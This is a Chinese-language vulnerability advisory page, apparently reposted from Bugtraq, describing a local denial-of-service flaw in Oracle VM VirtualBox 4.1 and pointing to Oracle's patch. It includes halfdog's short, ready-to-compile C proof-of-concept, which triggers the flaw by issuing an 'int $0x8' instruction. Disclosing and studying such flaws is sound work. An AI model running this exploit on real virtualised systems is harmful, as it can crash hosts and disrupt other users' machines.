Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Oracle VM VirtualBox本地拒绝服务漏洞

发布日期:2012-09-08
更新日期:2012-09-12受影响系统:
Oracle VM VirtualBox 4.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55471VirtualBox是一种x86的虚拟化产品。Oracle VM VirtualBox存在本地拒绝服务漏洞,攻击者可利用此漏洞造成拒绝服务。<*来源:halfdog
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!/** This software is provided by the copyright owner "as is" and any
*  expressed or implied warranties, including, but not limited to,
*  the implied warranties of merchantability and fitness for a particular
*  purpose are disclaimed. In no event shall the copyright owner be
*  liable for any direct, indirect, incidential, special, exemplary or
*  consequential damages, including, but not limited to, procurement
*  of substitute goods or services, loss of use, data or profits or
*  business interruption, however caused and on any theory of liability,
*  whether in contract, strict liability, or tort, including negligence
*  or otherwise, arising in any way out of the use of this software,
*  even if advised of the possibility of such damage.
*
*  Copyright (c) 2012 halfdog <me (%) halfdog.net>
*
*  Compile: gcc -o RtcInt RtcInt.c
*  Usage: ./RtcInt
*/
int main(int argc, char **argv) {
  asm (
    "int $0x8;"
    : // output: none
    : // input: none
    :"%eax", "%ebx", "%ecx", "%edx"   // clobbered register
  );
  return(0);
}建议:
--------------------------------------------------------------------------------
厂商补丁:Oracle
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.oracle.com/technetwork/topics/security/FreeRADIUS多个栈缓冲区溢出漏洞XnView TIFF图形处理多个远程堆缓冲区溢出漏洞相关资讯      拒绝服务漏洞 
  • 数字签名拒绝服务漏洞(CVE-2013-  (11/13/2013 12:25:03)
  • Intel 82574L Gigabit Ethernet   (03/01/2013 21:09:03)
  • Wireshark DTN Dissector 拒绝服务  (02/03/2013 10:37:43)
  • Rockwell Automation FactoryTalk   (04/10/2013 09:08:12)
  • IBM WebSphere Message Broker多个  (03/01/2013 21:04:45)
  • HP XP P9000 Command View   (02/03/2013 10:36:32)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款